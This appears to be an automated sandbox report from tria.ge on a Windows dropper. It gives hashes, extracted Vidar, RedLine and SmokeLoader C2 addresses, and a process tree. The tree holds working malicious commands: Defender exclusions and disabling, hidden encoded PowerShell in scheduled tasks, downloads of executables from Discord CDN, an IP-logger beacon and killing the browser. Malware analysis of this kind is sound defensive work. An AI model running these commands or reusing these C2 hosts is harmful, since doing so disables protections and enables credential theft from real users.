Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
71s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28/09/2021, 20:22
General
-
Target
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
-
Size
3.9MB
-
MD5
1be0d2741eaac6804e24a7586b1086b0
-
SHA1
cdb330156b2063c6f259cb10a787463756798f7a
-
SHA256
071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
-
SHA512
cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85
Score
10/10
Malware Config
Extracted
Family
vidar
Version
40.1
Botnet
706
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
redline
Botnet
pab4
C2
185.215.113.15:61506
Extracted
Family
smokeloader
Version
2020
C2
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
7.5k_Z_BOGOM
C2
195.133.18.154:30491
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 7 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of FindShellTrayWindow 6 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exeThu0247e977c7950492a.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exe"C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0247e977c7950492a.exe" -a5⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02483b39590da5492.exeThu02483b39590da5492.exe4⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu0299d0d70a4d322.exeThu0299d0d70a4d322.exe4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02966ca5c58f270.exeThu02966ca5c58f270.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 9285⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02f60acc90a3.exeThu02f60acc90a3.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02c015332704.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02c015332704.exeThu02c015332704.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02bfe1521bcc038.exeThu02bfe1521bcc038.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Del.doc5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NZrkFJTgsCdMvCokxiUUxUBYmGUZCyshQzrAfUxHKQBByATJNifzJsTTnyLZOTMjkrVrmIWmMjlEaZSZNkkcPXDmmpwppcSQtfd$" Una.doc7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comRiconobbe.exe.com H7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Riconobbe.exe.com H8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
-
C:\Windows\SysWOW64\PING.EXEping RSSLLXYN -n 307⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02d385ff55.exe3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe3⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02d385ff55.exeThu02d385ff55.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\dPw5Ib9QBeGmCG91maYltB46.exe"C:\Users\Admin\Documents\dPw5Ib9QBeGmCG91maYltB46.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSFBB.tmp\Install.exe.\Install.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS2AB6.tmp\Install.exe.\Install.exe /S /site_id "394347"4⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjPdhkgwe" /SC once /ST 12:26:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjPdhkgwe"5⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjPdhkgwe"5⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\wLVKECk.exe\" uG /site_id 394347 /S" /V1 /F5⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\Documents\q_T1vdWa89TkW6vkpINBYOh4.exe"C:\Users\Admin\Documents\q_T1vdWa89TkW6vkpINBYOh4.exe"2⤵
-
-
C:\Users\Admin\Documents\IVNm1qs84EVuVz4XF2WMYEUx.exe"C:\Users\Admin\Documents\IVNm1qs84EVuVz4XF2WMYEUx.exe"2⤵
-
-
C:\Users\Admin\Documents\ffLpD3hy57DYkcZoJcBH5VLN.exe"C:\Users\Admin\Documents\ffLpD3hy57DYkcZoJcBH5VLN.exe"2⤵
-
-
C:\Users\Admin\Documents\QHcMEYX7gcrHWuCLl93Rs0W4.exe"C:\Users\Admin\Documents\QHcMEYX7gcrHWuCLl93Rs0W4.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
-
-
-
-
C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\12BB.bat C:\Users\Admin\Documents\CCGhcmaCaXBJqIg11rIVG8UJ.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\12B9.tmp\12BA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""4⤵
-
-
-
-
C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe"C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe"2⤵
-
C:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exeC:\Users\Admin\Documents\c2XgxFbhS2CcPAJ9s3xNcd2Z.exe3⤵
-
-
-
C:\Users\Admin\Documents\90ZS7lblTU0b8CDGokcX3kbU.exe"C:\Users\Admin\Documents\90ZS7lblTU0b8CDGokcX3kbU.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"3⤵
-
C:\Users\Admin\AppData\Local\Temp\269new.exe"269new.exe"4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"4⤵
-
-
-
-
C:\Users\Admin\Documents\LaTj_UCNH_apS0BWR011jP3L.exe"C:\Users\Admin\Documents\LaTj_UCNH_apS0BWR011jP3L.exe"2⤵
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\10044730-ff21-4a35-b865-d11e68f0f042\AdvancedRun.exe" /SpecialRun 4101d8 44204⤵
-
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe" -Force3⤵
-
-
C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"C:\Users\Admin\Documents\4s1cjEpqvaLJjD4YzGyUvoPq.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 19083⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\POJjnd4yX1QdC2tGCPMDcWFA.exe"C:\Users\Admin\Documents\POJjnd4yX1QdC2tGCPMDcWFA.exe"2⤵
-
-
C:\Users\Admin\Documents\a2ExsgEJPCo87mIa1w5x3NKN.exe"C:\Users\Admin\Documents\a2ExsgEJPCo87mIa1w5x3NKN.exe"2⤵
-
-
C:\Users\Admin\Documents\D7MRfhIYj4MqyU6a9zH1sISE.exe"C:\Users\Admin\Documents\D7MRfhIYj4MqyU6a9zH1sISE.exe"2⤵
-
-
C:\Users\Admin\Documents\6DlWRP2zRqgVktoNNTFSEnau.exe"C:\Users\Admin\Documents\6DlWRP2zRqgVktoNNTFSEnau.exe"2⤵
-
-
C:\Users\Admin\Documents\TyuSPUqMot9veNWUIsEz10ia.exe"C:\Users\Admin\Documents\TyuSPUqMot9veNWUIsEz10ia.exe"2⤵
-
-
C:\Users\Admin\Documents\LwGxRY1eqoJqUMNgYvETJBM_.exe"C:\Users\Admin\Documents\LwGxRY1eqoJqUMNgYvETJBM_.exe"2⤵
-
-
C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe"C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe"2⤵
-
C:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exeC:\Users\Admin\Documents\PEUPwD381h8qmqWsSnLDeHJS.exe3⤵
-
-
-
C:\Users\Admin\Documents\rtnkcdFhGXFf_t4VoszrAhiB.exe"C:\Users\Admin\Documents\rtnkcdFhGXFf_t4VoszrAhiB.exe"2⤵
-
-
C:\Users\Admin\Documents\KTZMQgjJckAGP4Q_f2aIAWSW.exe"C:\Users\Admin\Documents\KTZMQgjJckAGP4Q_f2aIAWSW.exe"2⤵
-
-
C:\Users\Admin\Documents\l16rJS0dRn15nn2h6PWO3L2M.exe"C:\Users\Admin\Documents\l16rJS0dRn15nn2h6PWO3L2M.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 12243⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\65miLOnNt8qLS6VsWqqtapXx.exe"C:\Users\Admin\Documents\65miLOnNt8qLS6VsWqqtapXx.exe"2⤵
-
-
C:\Users\Admin\Documents\py6McDjQFhLs7YbfCr5U6GE0.exe"C:\Users\Admin\Documents\py6McDjQFhLs7YbfCr5U6GE0.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6563⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6723⤵
- Program crash
-
C:\Users\Admin\Documents\ajt_VHJlqQ1L3yXqSH86NomE.exe"C:\Users\Admin\Documents\ajt_VHJlqQ1L3yXqSH86NomE.exe"4⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6283⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 6323⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 10683⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\qmeF0LJEiySslhxcq7VAIw6k.exe"C:\Users\Admin\Documents\qmeF0LJEiySslhxcq7VAIw6k.exe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"2⤵
-
C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"C:\Users\Admin\Documents\AY4BV8Ofcg6yqyMxWipE3oX0.exe"3⤵
-
-
-
C:\Users\Admin\Documents\v0MKrQ5qmABvKx0_yjZ0pp1f.exe"C:\Users\Admin\Documents\v0MKrQ5qmABvKx0_yjZ0pp1f.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS08840DA2\Thu02588bdad8e7.exeThu02588bdad8e7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &1⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\3919232.scr"C:\Users\Admin\AppData\Roaming\3919232.scr" /S1⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"2⤵
-
-
C:\Users\Admin\AppData\Roaming\3239495.scr"C:\Users\Admin\AppData\Roaming\3239495.scr" /S1⤵
-
C:\Users\Admin\AppData\Roaming\3240121.scr"C:\Users\Admin\AppData\Roaming\3240121.scr" /S1⤵
-
C:\Users\Admin\AppData\Roaming\4217321.scr"C:\Users\Admin\AppData\Roaming\4217321.scr" /S1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
-
Filesize
32.0MB
-
Filesize
4KB
-
Filesize
40.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
36KB
-
Filesize
31.7MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
860KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
39.6MB
-
Filesize
1.3MB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4.5MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.8MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
39.7MB
-
Filesize
4KB
-
Filesize
316KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.8MB
-
Filesize
1.6MB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB